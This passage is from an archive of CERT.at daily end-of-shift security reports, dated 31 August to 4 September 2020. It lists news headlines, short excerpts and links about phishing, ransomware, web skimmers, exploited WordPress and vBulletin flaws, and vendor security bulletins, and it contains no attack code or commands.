Chance haben, Sicherheitssysteme zu umgehen. --------------------------------------------- https://www.zdnet.de/88382491/manipulierte-excel-dateien-in-phishing-mails/ ∗∗∗ Angriffe auf WordPress-Plugin ∗∗∗ --------------------------------------------- Millionen von WordPress-Sites wurden diese Woche angegriffen, weil Hacker eine Zero-Day-Schwachstelle in "File Manager", einem beliebten WordPress-Plugin, ausnutzen. --------------------------------------------- https://www.zdnet.de/88382493/angriffe-auf-wordpress-plug-in/ ===================== = Vulnerabilities = ===================== ∗∗∗ Linux: Keine Eile beim Schließen einer Kernel-Sicherheitslücke ∗∗∗ --------------------------------------------- Mit einem Buffer Overflow im Linux-Kernel lässt sich ein System durch lokale Nutzer zum Absturz bringen, eine Rechteausweitung ist wohl möglich. --------------------------------------------- https://www.golem.de/news/linux-keine-eile-beim-schliessen-einer-kernel-sic… ∗∗∗ Insufficient Privilege Validation in NextScripts: Social Networks Auto-Poster ∗∗∗ --------------------------------------------- During a routine research audit for our Sucuri Firewall, we discovered a post deletion, arbitrary posting in social networks, and arbitrary plugin settings update affecting over 100,000 users of the WordPress plugin. --------------------------------------------- https://blog.sucuri.net/2020/09/insufficient-privilege-validation-in-nextsc… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (ark, netty, netty-3.9, qemu, squid3, and xorg-server), Fedora (chromium), Gentoo (dovecot and gnutls), Mageia (ansible, postgresql, and python-rsa), openSUSE (curl, freerdp, libX11, php7, squid, and xorg-x11-server), Oracle (kernel), Red Hat (thunderbird), Slackware (gnutls), and SUSE (firefox, kernel, and thunderbird). --------------------------------------------- https://lwn.net/Articles/830856/ ∗∗∗ Security Bulletin: Cross-site scripting vulnerability affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4698 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln… ∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK affects IMS™ Enterprise Suite: Explorer for Development (CVE-2020-14577) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java… ∗∗∗ Security Bulletin: Vulnerabilities in IBM Java Runtime affecting Tivoli Netcool/OMNIbus (Multiple CVEs) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ibm-ja… ∗∗∗ Security Bulletin: Cross Site Scripting vulnerabilities in jQuery might affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-7656, CVE-2020-11022, CVE-2020-11023 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln… ∗∗∗ Security Bulletin: Enterprise Content Management System Monitor is affected by a vulnerability in IBM® SDK Java™ Technology Edition ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-enterprise-content-manage… ∗∗∗ Security Bulletin: Cross-site scripting vulnerability affects IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4516 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-vuln… ∗∗∗ Security Bulletin: IBM Aspera Shares 1.9.14 Patch Level 1 and earlier are vulnerable to DOM XSS ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-aspera-shares-1-9-14-… ∗∗∗ Security Bulletin: Java Quarterly CPU affecting Watson Knowledge Catalog for IBM Cloud Pak for Data ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-java-quarterly-cpu-affect… ∗∗∗ Nagios Enterprises Nagios XI: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0868 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.09.2020
by Daily end-of-shift report 04 Sep '20

04 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 03-09-2020 18:00 − Freitag 04-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ FBI: Thousands of orgs targeted by RDoS extortion campaign ∗∗∗ --------------------------------------------- The FBI warns US companies that thousands of organizations around the world, from various industry sectors, have been threatened with DDoS attacks within six days unless they pay a Bitcoin ransom. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fbi-thousands-of-orgs-target… ∗∗∗ Phishing adds overlay on official company page to steal logins ∗∗∗ --------------------------------------------- A phishing campaign deployed recently at various businesses uses the companys home page to disguise the attack and trick potential victims into providing login credentials. --------------------------------------------- https://www.bleepingcomputer.com/news/security/phishing-adds-overlay-on-off… ∗∗∗ A blast from the past - XXEncoded VB6.0 Trojan, (Fri, Sep 4th) ∗∗∗ --------------------------------------------- While going over what my e-mail malware quarantine caught during this week, I found a message which made me feel rather nostalgic. Among the usual maldocs, ZIPs and ACEs, there was also an e mail carrying an XXE file in its attachment. --------------------------------------------- https://isc.sans.edu/diary/rss/26538 ∗∗∗ Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496 ∗∗∗ --------------------------------------------- We provide an analysis of CVE-2020-17496, proof of concept code to demonstrate the vulnerability and information on attacks we have observed. --------------------------------------------- https://unit42.paloaltonetworks.com/cve-2020-17496/ ∗∗∗ Thanos Ransomware: Destructive Variant Targeting State-Run Organizations in the Middle East and North Africa ∗∗∗ --------------------------------------------- We observed a variant of the Thanos ransomware that attempted to overwrite the master boot record, a more destructive approach than previous versions. --------------------------------------------- https://unit42.paloaltonetworks.com/thanos-ransomware/ ∗∗∗ Firefox will add a new drive-by-download protection ∗∗∗ --------------------------------------------- Firefox will block automatic downloads initiated from sandboxed iframes -- the technology usually used for web embeds. --------------------------------------------- https://www.zdnet.com/article/firefox-will-add-a-new-drive-by-download-prot… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (curl, dovecot, geary, httpd, lua, mysql-connector-java, and squid), Mageia (lua and lua5.3, sane, and squid), Oracle (dovecot), Scientific Linux (dovecot), SUSE (java-1_7_1-ibm, kernel, php5, and xorg-x11-server), and Ubuntu (firefox). --------------------------------------------- https://lwn.net/Articles/830632/ ∗∗∗ Security Bulletin: IBM InfoSphere Metadata Asset Manager is vulnerable to stored cross-site scripting and server-side request forgery. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-infosphere-metadata-a… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation for Multiplatforms Apr 2020 CPU ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation for Multiplatforms Oct 2019 CPU (CVE-2019-2964, CVE-2019-2989 ) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Netcool Agile Service Manager (CVE-2020-2654) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: Improper DLL loading vulnerability affecting Aspera Connect 3.9.9 and earlier ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-improper-dll-loading-vuln… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 03.09.2020
by Daily end-of-shift report 03 Sep '20

03 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 02-09-2020 18:00 − Donnerstag 03-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Microsoft Defender can ironically be used to download malware ∗∗∗ --------------------------------------------- A recent update to Windows 10s Microsoft Defender antivirus solution ironically allows it to download malware and other files to a Windows computer. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-iron… ∗∗∗ Sandbox Evasion Using NTP, (Thu, Sep 3rd) ∗∗∗ --------------------------------------------- I'm still hunting for interesting (read: "malicious") Python samples. By reading my previous diaries, you know that I like to find how attackers implement obfuscation and evasion techniques. Like yesterday, I found a Python sample that creates a thread to run a malicious shellcode[1]. But before processing the shellcode, it performs suspicious network traffic: [...] --------------------------------------------- https://isc.sans.edu/diary/rss/26534 ∗∗∗ Salfram: Robbing the place without removing your name tag ∗∗∗ --------------------------------------------- By Holger Unterbrink and Edmund Brumaghin. Threat summary Cisco Talos recently uncovered a series of email campaigns utilizing links to malicious documents hosted on legitimate file-sharing platforms to spread malware.The campaigns distributed various malware payloads including Gozi ISFB, ZLoader, SmokeLoader and AveMaria, among others. Ongoing campaigns are distributing various malware families using the same crypter. --------------------------------------------- https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-re… ∗∗∗ Inter: The Magecart Skimming Tool Now on More than 1,500 Sites ∗∗∗ --------------------------------------------- Digital web skimming attacks continue to increase. By now, anyone running an e-commerce shop is aware of the dangers of groups like Magecart, which infect a website every 16 minutes. However, to truly understand these skimmer groups, you have to understand the tools of the trade. The Inter Skimmer kit is one of todays most common and widely used digital skimming solutions globally. --------------------------------------------- https://www.riskiq.com/blog/external-threat-management/inter-skimmer/ ∗∗∗ New Python-scripted trojan malware targets fintech companies ∗∗∗ --------------------------------------------- PyVil RAT is capable of keylogging, taking screenshots and more - and the those behind it have gone to great lengths to keep it as under the radar as possible. --------------------------------------------- https://www.zdnet.com/article/new-python-scripted-trojan-malware-targets-fi… ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Sicherheitsupdates: Jabber + präparierte Nachricht = Schadcode ∗∗∗ --------------------------------------------- Cisco hat Sicherheitsupdates für unter anderem Jabber, IOS XR und Webex Meetings veröffentlicht. --------------------------------------------- https://heise.de/-4884609 ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (asyncpg and uwsgi), Mageia (cairo), openSUSE (chromium, kernel, and postgresql10), Red Hat (dovecot and squid:4), SUSE (curl, java-1_7_0-ibm, java-1_7_1-ibm, java-1_8_0-ibm, kernel, libX11, php7, squid, and xorg-x11-server), and Ubuntu (apport, libx11, and xorg-server, xorg-server-hwe-16.04, xorg-server-hwe-18.04). --------------------------------------------- https://lwn.net/Articles/830496/ ∗∗∗ Backdoors left unpatched in MoFi routers ∗∗∗ --------------------------------------------- MoFi Network patched only six of ten reported vulnerabilities, leaving three hard-coded undocumented backdoor systems in place. --------------------------------------------- https://www.zdnet.com/article/backdoors-left-unpatched-in-mofi-routers/ ∗∗∗ Security Bulletin: IBM API Connect's Developer Portal is impacted by vulnerabilities in MySQL. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connects-develope… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Information exposure in HTML comments vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM API Connect's Developer Portal is vulnerable to social engineering attacks (CVE-2020-4337) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connects-develope… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Hard-coded passwords vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Improper Restriction of Excessive Authentication Attempts vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Oracle MySQL vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Use of Broken or Risky Cryptographic Algorithm vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Use of Insufficiently Random Value vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by Oracle MySQL vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by Oracle MySQL vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 02.09.2020
by Daily end-of-shift report 02 Sep '20

02 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 01-09-2020 18:00 − Mittwoch 02-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Attackers abuse Google DNS over HTTPS to download malware ∗∗∗ --------------------------------------------- More details have emerged on a malware sample that uses Google DNS over HTTPS to retrieve the stage 2 malicious payload. --------------------------------------------- https://www.bleepingcomputer.com/news/security/attackers-abuse-google-dns-o… ∗∗∗ Exposed Windows Domain Controllers Used in CLDAP DDoS Attacks, (Tue, Sep 1st) ∗∗∗ --------------------------------------------- LDAP, like many UDP based protocols, has the ability to send responses that are larger than the request. With UDP not requiring any handshake before data is sent, these protocols make ideal amplifiers for reflective distributed denial of service attacks. Most commonly, these attacks abuse DNS and we have talked about this in the past. But LDAP is another protocol that is often abused. --------------------------------------------- https://isc.sans.edu/diary/rss/26526 ∗∗∗ Using assert() to Execute Malware in PHP 7 Environments ∗∗∗ --------------------------------------------- Initially released December 2015, PHP 7 introduced a multitude of performance and security improvements. Approximately 43.7% of websites across the web currently use PHP 7.x, making it an incredibly popular scripting language — which is likely why attackers are creating malware to target environments which leverage it. During a recent investigation, our team stumbled across some malicious code which is used to inject a .user.ini file into a PHP 7 environment and add zend.assertions = 1. --------------------------------------------- https://blog.sucuri.net/2020/09/using-assert-to-execute-malware-php-7.html ∗∗∗ Cloud firewall management API SNAFU put 500k SonicWall customers at risk ∗∗∗ --------------------------------------------- TL;DR I found an IDOR in SonicWall’s cloud management platform API Any user could add themselves to any account at any organisation using it Anyone could create a user account [...] --------------------------------------------- https://www.pentestpartners.com/security-blog/cloud-firewall-management-api… ∗∗∗ Erpressungs-Mail mit Bombendrohung massenhaft versendet ∗∗∗ --------------------------------------------- Vorsicht vor einer betrügerischen Erpressungs-E-Mail: Kriminelle versenden Nachrichten, in denen sie behaupten, dass eine Bombe im Geschäftsgebäude der EmpfängerInnen platziert wurde. Sollten die Unternehmen, die die Nachrichten erhalten haben, nicht binnen 80 Stunden 20.000 Dollar in Bitcoin bezahlen, soll diese explodieren. Die E-Mail ist frei erfunden und es muss nichts bezahlt werden! --------------------------------------------- https://www.watchlist-internet.at/news/erpressungs-mail-mit-bombendrohung-m… ===================== = Vulnerabilities = ===================== ∗∗∗ New Intel microcode updates for Windows 10 fix CPU hardware bugs ∗∗∗ --------------------------------------------- Microsoft has released a new batch of Intel microcode updates for Windows 10 2004, 1909, 1903, and older versions to fix hardware bugs in Intel CPUs. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/new-intel-microcode-updates… ∗∗∗ Magento Sites Vulnerable to RCE Stemming From Magmi Plugin Flaws ∗∗∗ --------------------------------------------- Two flaws - one of them yet to be fixed - are afflicting a third-party plugin used by Magento e-commerce websites. --------------------------------------------- https://threatpost.com/magento-sites-vulnerable-to-rce-stemming-from-magmi-… ∗∗∗ Verschlüsselung: TLS-1.3-Fauxpas gefährdet Embedded-Systeme mit wolfSSL ∗∗∗ --------------------------------------------- Aus Sicherheitsgründen sollten Admins die TLS-Programmbibliothek wolfSSL auf den aktuellen Stand bringen. --------------------------------------------- https://heise.de/-4883741 ∗∗∗ TYPO3-EXT-SA-2020-017: Multiple vulnerabilities in extension "Event management and registration" (sf_event_mgt) ∗∗∗ --------------------------------------------- It has been discovered that the extension "Event management and registration" (sf_event_mgt) is susceptible to Information Disclosure and Broken Access Control. --------------------------------------------- https://typo3.org/security/advisory/typo3-ext-sa-2020-017 ∗∗∗ TYPO3-EXT-SA-2020-016: Information Disclosure in extension "Localization Manager" (l10nmgr) ∗∗∗ --------------------------------------------- It has been discovered that the extension "Localization Manager" (l10nmgr) is susceptible to Information Disclosure. --------------------------------------------- https://typo3.org/security/advisory/typo3-ext-sa-2020-016 ∗∗∗ 700,000 WordPress Users Affected by Zero-Day Vulnerability in File Manager Plugin ∗∗∗ --------------------------------------------- This morning, on September 1, 2020, the Wordfence Threat Intelligence team was alerted to the presence of a vulnerability being actively exploited in File Manager, a WordPress plugin with over 700,000 active installations. This vulnerability allowed unauthenticated users to execute commands and upload malicious files on a target site. A patch was released this morning [...] --------------------------------------------- https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-z… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (firefox), Mageia (mutt and putty), openSUSE (ldb, samba, libqt5-qtbase, opera, and postgresql10), Red Hat (bash, kernel, and libvncserver), SUSE (apache2, curl, and squid), and Ubuntu (ark, linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4, linux-gcp, linux-gcp-5.4, linux-kvm, linux-oracle, linux-oracle-5.4, linux-raspi, linux-raspi-5.4, linux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15, linux-gcp, linux-gcp-4.15, [...] --------------------------------------------- https://lwn.net/Articles/830392/ ∗∗∗ Multiple Vulnerabilities in Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W ∗∗∗ --------------------------------------------- https://sec-consult.com/./en/blog/advisories/multiple-vulnerabilities-in-re… ∗∗∗ Security Advisory - Command Injection Vulnerability in Some Huawei Products ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200902-… ∗∗∗ Security Advisory - DoS Vulnerability in Some Huawei Smart Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200902-… ∗∗∗ Security Advisory - Information Disclosure Vulnerability in Several Smartphones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200902-… ∗∗∗ Security Advisory - Remote Code Execution vulnerability in Apache Struts 2 ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200902-… ∗∗∗ Security Bulletin: Multiple vulnerabilities of Mozilla Firefox (less than Firefox 68.9.0 ESR) hava affected Synthetic Playback Agent 8.1.4.0-8.1.4 IF11 + ICAM2019.3.0 – 2020.2.0 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Cross-Site Scripting vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: Vulnerability in Apache Commons Codec affects IBM Spectrum Scale Transparent Cloud Tiering (177835) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-c… ∗∗∗ Security Bulletin: Code injection vulnerability in IBM Spectrum Protect Operations Center (CVE-2020-4693) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-code-injection-vulnerabil… ∗∗∗ Security Bulletin: Information Disclosure vulnerability in IBM Spectrum Protect Server (CVE-2020-4591) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-vu… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by Use of Hard-Coded Credentials vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Spectrum Scale Transparent Cloud Tiering is affected by a Java vulnerability (CVE-2020-2654) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-spectrum-scale-transp… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by an OS Command Injection vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by an OS Command Injection vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 01.09.2020
by Daily end-of-shift report 01 Sep '20

01 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Montag 31-08-2020 18:00 − Dienstag 01-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Hackers are backdooring QNAP NAS devices with 3-year old RCE bug ∗∗∗ --------------------------------------------- Hackers are scanning for vulnerable network-attached storage (NAS) devices running multiple QNAP firmware versions, trying to exploit a remote code execution (RCE) vulnerability addressed by QNAP in a previous release. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-are-backdooring-qnap… ∗∗∗ DLL Fixer leads to Cyrat Ransomware ∗∗∗ --------------------------------------------- A new ransomware uses an unusual symmetric encryption method named "Fernet". It is Python based and appends .CYRAT to encrypted files. --------------------------------------------- https://feeds.feedblitz.com/~/634890360/0/gdatasecurityblog-en~DLL-Fixer-le… ∗∗∗ Notarisierte Mac-Malware: Apple beglaubigte offenbar mehrfach Trojaner ∗∗∗ --------------------------------------------- Apples Notarisierungsdienst soll Mac-Nutzer vor Malware schützen. Nun beglaubigte der Hersteller auch den notorischen Schädling "Shlayer". --------------------------------------------- https://heise.de/-4882770 ∗∗∗ New web skimmer steals credit card data, sends to crooks via Telegram ∗∗∗ --------------------------------------------- Criminals steal payment data from online shoppers by abusing the Telegram instant messaging API, inserting credit card skimming code. --------------------------------------------- https://blog.malwarebytes.com/web-threats/2020/09/web-skimmer-steals-credit… ∗∗∗ Quarterly Report: Incident Response trends in Summer 2020 ∗∗∗ --------------------------------------------- By David Liebenberg and Caitlin Huey. For the fifth quarter in a row, Cisco Talos Incident Response (CTIR) observed ransomware dominating the threat landscape. Infections involved a wide variety of malware families including Ryuk, Maze, LockBit, and Netwalker, among others. In a continuation of trends observed in last quarter’s report, these ransomware attacks have relied much less on commodity trojans such as Emotet and Trickbot. --------------------------------------------- https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.ht… ∗∗∗ Gratis iPhone 11 oder Samsung Galaxy S20 durch Hofer-Umfrage? ∗∗∗ --------------------------------------------- Kriminelle geben sich als Hofer aus und versenden wahllos E-Mails, in denen behauptet wird, Ihre E-Mail- bzw. IP-Adresse sei ausgewählt worden. Sie sollen daher an einer kurzen Umfrage teilnehmen und dadurch ein kostenloses iPhone 11 oder Samsung Galaxy S20 erhalten. Vorsicht: Die E-Mail stammt nicht von Hofer, Sie erhalten kein Smartphone geschenkt und Sie landen in einer teuren Abo-Falle! --------------------------------------------- https://www.watchlist-internet.at/news/gratis-iphone-11-oder-samsung-galaxy… ∗∗∗ Cybersquatting: Attackers Mimicking Domains of Major Brands Including Facebook, Apple, Amazon and Netflix to Scam Consumers ∗∗∗ --------------------------------------------- Our researchers analyzed data on cybersquatting to learn which domains attackers most often mimic and other key details of the practice. --------------------------------------------- https://unit42.paloaltonetworks.com/cybersquatting/ ∗∗∗ "Accessible Ubiquiti Service Discovery": Erster Datenfeed in der Taxonomie "Intrusions" ∗∗∗ --------------------------------------------- Ubiquiti Geräte benutzen ein Discovery Protokoll, um sich gegenseitig automatisch zu erkennen. Während das innerhalb des eigenen Netzwerks nützlich sein kann, machen fehlerhaft konfigurierte Geräte eine Vielzahl an Daten über sich öffentlich abrufbar. Als wäre dieses Problem nicht genug, gab es in älteren Firmware-Versionen eine Schwachstelle, die eine automatisierte Übernahme der betroffenen Systeme ermöglicht(e). --------------------------------------------- https://cert.at/de/blog/2020/9/accessible-ubiquiti-service-discovery-erster… ===================== = Vulnerabilities = ===================== ∗∗∗ Sicherheitsupdates: Schutzsoftware von Trend Micro kann PCs gefährden ∗∗∗ --------------------------------------------- Es gibt wichtige Sicherheitspatches für Trend Micro Apex One und OfficeScan XG. --------------------------------------------- https://heise.de/-4883268 ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (apache2 and libx11), Fedora (batik, ecj, eclipse, eclipse-cdt, eclipse-ecf, eclipse-emf, eclipse-gef, eclipse-m2e-core, eclipse-mpc, eclipse-mylyn, eclipse-remote, eclipse-webtools, firefox, httpd, jetty, lucene, selinux-policy, and univocity-parsers), Mageia (hylafax+), openSUSE (ark and chromium), Red Hat (virt:8.2 and virt-devel:8.2), SUSE (freeradius-server, freerdp, php7, php72, php74, and xorg-x11-server), and Ubuntu (freerdp2, keystone, [...] --------------------------------------------- https://lwn.net/Articles/830278/ ∗∗∗ QNAP NAS: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0857 ∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK affect IBM Cloud Manager with OpenStack (CVE-2019-2949) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java… ∗∗∗ Security Bulletin: Vulnerabilities in Faster-XML jackson-databind affects IBM Operations Analytics Predictive Insights ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster… ∗∗∗ Security Bulletin: Vulnerabilities in Faster-XML jackson-databind affect IBM Operations Analytics Predictive Insights ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster… ∗∗∗ Security Bulletin: IBM® Java™ SDK Technology Edition, Oct 2019, affects IBM Security Identity Manager Virtual Appliance ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-java-sdk-technology-e… ∗∗∗ Security Bulletin: CVE-2020-2654 may affect IBM® SDK, Java™ Technology Edition for Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2654-may-affect-… ∗∗∗ Security Bulletin: Vulnerabilities in Faster-XML jackson affect IBM Operations Analytics Predictive Insights (CVE-2019-14060, CVE-2019-14661, CVE-2019-14662) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster… ∗∗∗ Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… ∗∗∗ Security Bulletin: Vulnerability in Bash affects IBM Spectrum Protect Plus (CVE-2019-9924) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-bash-aff… ∗∗∗ Security Bulletin: IBM Resilient SOAR is Using Components with Known Vulnerabilities – Apache Thrift (CVE-2019-0205) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-soar-is-usi… ∗∗∗ Security Bulletin: A vulnerability in IBM WebSphere Application Server(Liberty profile) affects IBM Operations Analytics Predictive Insights (CVE-2020-4329) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-we… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 31.08.2020
by Daily end-of-shift report 31 Aug '20

31 Aug '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 28-08-2020 18:00 − Montag 31-08-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Emotet malwares new Red Dawn attachment is just as dangerous ∗∗∗ --------------------------------------------- The Emotet botnet has begun to use a new template for their malicious attachments, and it is just as dangerous as ever. --------------------------------------------- https://www.bleepingcomputer.com/news/security/emotet-malwares-new-red-dawn… ∗∗∗ Finding The Original Maldoc, (Sun, Aug 30th) ∗∗∗ --------------------------------------------- Xavier wrote about a "Malicious Excel Sheet with a NULL VT Score" and I showed how to extract the VBA code from the maldoc cleaned by AV. --------------------------------------------- https://isc.sans.edu/diary/rss/26520 ∗∗∗ Persistent WordPress User Injection ∗∗∗ --------------------------------------------- Our team recently stumbled across an interesting example of malicious code used to add an arbitrary user inside WordPress. The following code was detected at the bottom of the theme’s functions.php. It uses internal WordPress functions like wp_create_user() and add_role() to create a new user and elevate its role to “administrator:” --------------------------------------------- https://blog.sucuri.net/2020/08/persistent-wordpress-user-injection.html ∗∗∗ Its Not Just an Unusual Login: Why Pay Attention to Threats Facing SaaS and Cloud? ∗∗∗ --------------------------------------------- There is a whole category of cyber-attacks largely untouched by the media. With breaking threat discoveries usually focused on targeted spear-phishing campaigns or widespread ransomware, cyber-attacks targeting cloud and SaaS are often overlooked. --------------------------------------------- 